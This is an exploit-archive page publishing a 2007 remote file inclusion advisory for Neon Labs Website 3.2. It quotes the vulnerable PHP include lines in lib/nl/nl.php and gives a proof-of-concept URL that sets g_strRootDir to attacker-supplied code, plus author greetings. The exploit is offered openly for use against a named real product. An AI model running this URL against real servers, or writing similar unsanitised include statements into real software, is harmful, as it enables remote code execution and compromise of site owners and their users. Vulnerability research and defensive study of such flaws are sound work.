Neon Labs Website <= 3.2 (nl.php g_strRootDir) Remote Inclusion Vuln

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Neon Labs Website <= 3.2 (nl.php g_strRootDir) Remote Inclusion Vuln
# Published : 2007-01-20
# Author : 3l3ctric-Cracker
# Previous Title : Bradabra <= 2.0.5 (include/includes.php) Remote Inclusion Vulnerability
# Next Title : phpIndexPage <= 1.0.1 (config.php) Remote Inclusion Exploit

------------------------------------------------------------------------------------------------------------------------
Script:nlws
Affected Version:3.2
Downlaoad:http://neonlabs.structum.com.mx/pkgs/nlws_3-2.zip
------------------------------------------------------------------------------------------------------------------------
Author:Dr Max Virus
------------------------------------------------------------------------------------------------------------------------
Bug in (lib/nl/nl.php)
Vul Code;
include($g_strRootDir.$g_strLibDir."nl/nlsite.php");
include($g_strRootDir.$g_strLibDir."nl/nltable.php");
------------------------------------------------------------------------------------------------------------------------
POC:
http://[target]/[path]/lib/nl/nl.php?g_strRootDir=[Bad Code]
------------------------------------------------------------------------------------------------------------------------
Thx:str0ke-koray-Timq-r0ut3r-nuffsaid-All My Friends
Special Greetz:AsianEagle-TheMaster-Kacper-Hotturk
------------------------------------------------------------------------------------------------------------------------

# www.Syue.com [2007-01-20]